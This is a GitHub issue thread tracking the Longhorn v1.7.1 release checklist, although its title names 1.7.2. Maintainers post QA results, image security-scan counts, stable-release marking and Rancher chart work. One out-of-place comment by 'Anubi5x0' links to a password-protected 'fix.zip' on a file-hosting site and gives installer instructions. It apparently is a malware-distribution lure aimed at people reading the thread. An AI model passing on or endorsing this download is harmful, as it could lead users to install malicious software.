### ISSUE TITLE
[RELEASE] Release 1.7.2

### ISSUE THREAD

**Issue by derekbit** [longhorn/longhorn#9346]
## What's the task? Please describe.
Action items for releasing v<1.7.1>

## Roles
- Release captain: @derekbit 
- QA captain: @yangchiu 

### Pre-Release

**The Release Captain needs to finish the following items.**

- [x] Before creating RC1, create a new release branch for the following component repositories, and then create RC1 from the new branch. Leave the master branch for the next feature release development (This task is only needed when doing a feature release such as 1.7.1).
  - longhorn-manager
  - longhorn-ui
  - longhorn-tests
  - longhorn-engine
  - longhorn-instance-manager
  - longhorn-share-manager
  - backing-image-manager
  - longhorn-spdk-engine (needed after GA)
  - cli
- [x] Trigger the GA release build by [longhorn/longhorn Actions](https://github.com/longhorn/longhorn)

**The QA captain needs to coordinate the following items before the GA release.**

- [ ] Regression test plan (manual)
- [ ] Run e2e regression for pre-GA milestones (`install`, `upgrade`) @yangchiu 
- [ ] Run security testing of container images for pre-GA milestones @yangchiu 
- [ ] Verify longhorn chart PR to ensure all artifacts are ready for GA (`install`, `upgrade`)
- [ ] Run core testing (install, upgrade) for the GA build
  - Upgrade from the previous patch of the same feature release. 
  - Upgrade from the last patch of the previous feature release.
 
### Release

**The Release Captain needs to finish the following items.**

- [ ] [Release note]() - Release Captain 
  - [ ] Deprecation note
  - [ ] Upgrade notes including highlighted notes, deprecation, compatible changes, and others impacting the current users
- [ ] [Publish the new version of doc and add a next patch version of dev doc]().
- [ ] Release longhorn/chart from the release branch to publish to [ArtifactHub]() by [longhorn/charts Actions](https://github.com/longhorn/charts)
- [ ] [Marked the release as `latest` release in longhorn/longhorn]() [README.md]()
- [ ] Marked the release as `stable` release 
  - For the first stable release, we need to consider several factors and reach a consensus by maintainers before claiming it stable. 
  - For any patch release after a stable release, we need to wait 1-2 weeks for user feedback.

### Post-Release

**After marking the release as a `stable` release, Release Captain needs to coordinate the following items**

- [ ] Update https://github.com/longhorn/longhorn/blob/master/deploy/upgrade_responder_server/chart-values.yaml  - @PhanLe1010 
- [ ] Add another request for the rancher charts for the next patch release - @rebeccazzzz  

### Rancher Charts

**The Release Captain needs to coordinate the following items.**

- [ ] Verify the chart can be installed & upgraded - QA captain
- [ ] rancher/image-mirrors update - @mantissahz @PhanLe1010
- [ ] rancher/charts active branches for Rancher App Marketplace - @mantissahz @PhanLe1010 

cc @longhorn/qa @longhorn/dev

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yangchiu** [comment]
Run security testing of container images for pre-GA milestones:

[v1.7.1-rc1](https://ci.longhorn.io/job/private/job/image-security-scan/1548/): 7 CRITICAL, 24 HIGH
[v1.7.1-rc2](https://ci.longhorn.io/job/private/job/image-security-scan/1549/):

**Comment by derekbit** [comment]
> Run security testing of container images for pre-GA milestones:
> 
> [v1.7.1-rc1](https://ci.longhorn.io/job/private/job/image-security-scan/1548/): 7 CRITICAL, 24 HIGH [v1.7.1-rc2](https://ci.longhorn.io/job/private/job/image-security-scan/1549/): 7 CRITICAL, 24 HIGH [v1.7.1-rc3](https://ci.longhorn.io/job/private/job/image-security-scan/1554/): 5 CRITICAL, 21 HIGH

Fixed in https://github.com/longhorn/longhorn/issues/9354

**Comment by yangchiu** [comment]
Run core testing (install, upgrade) for the GA build:

[v1.7.1 amd64](https://ci.longhorn.io/job/public/job/v1.7.x/job/v1.7.x-longhorn-tests-sles-amd64/57/): 0 failure
[v1.7.1 arm64](https://ci.longhorn.io/job/public/job/v1.7.x/job/v1.7.x-longhorn-tests-sles-arm64/57/): 0 failure
[v1.7.1 amd64 upgrade](https://ci.longhorn.io/job/public/job/v1.7.x/job/v1.7.x-longhorn-upgrade-tests-sles-amd64/55/): 0 failure
[v1.7.1 arm64 upgrade](): In progress
[v1.7.1 amd64 2 stage upgrade](https://ci.longhorn.io/job/public/job/v1.7.x/job/v1.7.x-longhorn-upgrade-tests-sles-amd64/56/): 0 failure
[v1.7.1 arm64 2 stage upgrade](https://ci.longhorn.io/job/public/job/v1.7.x/job/v1.7.x-longhorn-upgrade-tests-sles-arm64/49/): 0 failure

**Comment by yangchiu** [comment]
Verify longhorn chart PR to ensure all artifacts are ready for GA (install, upgrade):

Verification passed for the following actions:

* Fresh install / upgrade from v1.6.2/v1.7.0 / uninstall by chart
* v1(RWX/RWO) / v2 volume replica rebuilding
* v1(RWX/RWO) / v2 volume detachment and reattachment
* Volume backup and restoration

**Comment by derekbit** [comment]
Let's wait for 2 weeks to gather feedback about 1.7.1 and determine if we can mark v1.7.1 as a stable version.

@PhanLe1010 and @mantissahz @roger-ryao @rebeccazzzz Let's continue the post release tasks and rancher chart release after it is marked as stable. Thank you.

cc @innobead

**Comment by derekbit** [comment]
cc @bk201 v1.7.1 is just released.

**Comment by derekbit** [comment]
@PhanLe1010 @mantissahz @rebeccazzzz 
v1.7.1 is just marked as `stable`. We can start the remaining post tasks. Thank you.

**Comment by mantissahz** [comment]
As we marked the v1.7.1 stable ([PR9457](https://github.com/longhorn/longhorn/pull/9457)), I will start to prepare the rancher chart next week.

**Comment by mantissahz** [comment]
Images are not mirrored because of some unauthorized issues https://github.com/rancher/image-mirror/actions/runs/10919337304/job/30306768564. cc @PhanLe1010
Now I'm testing charts using images from the `longhornio` repository.

**Comment by mantissahz** [comment]
> @mantissahz Is it resolved?

No. But we manually updated the mirrored images list, and the [PR](https://github.com/rancher/image-mirror/pull/726) was merged.

We might manually update the mirrored images in the future after discussing this with @PhanLe1010.

**Comment by roger-ryao** [comment]
All Rancher chart tests have passed, and the results are recorded in the commands below:
1. Rancher v2.9.2 : https://github.com/rancher/charts/pull/4472#issuecomment-2370219903
2. Rancher Prime v2.8.8 : https://github.com/rancher/charts/pull/4471#issuecomment-2370651696
3. Rancher Prime v2.7.15 : https://github.com/rancher/charts/pull/4470#issuecomment-2370776647
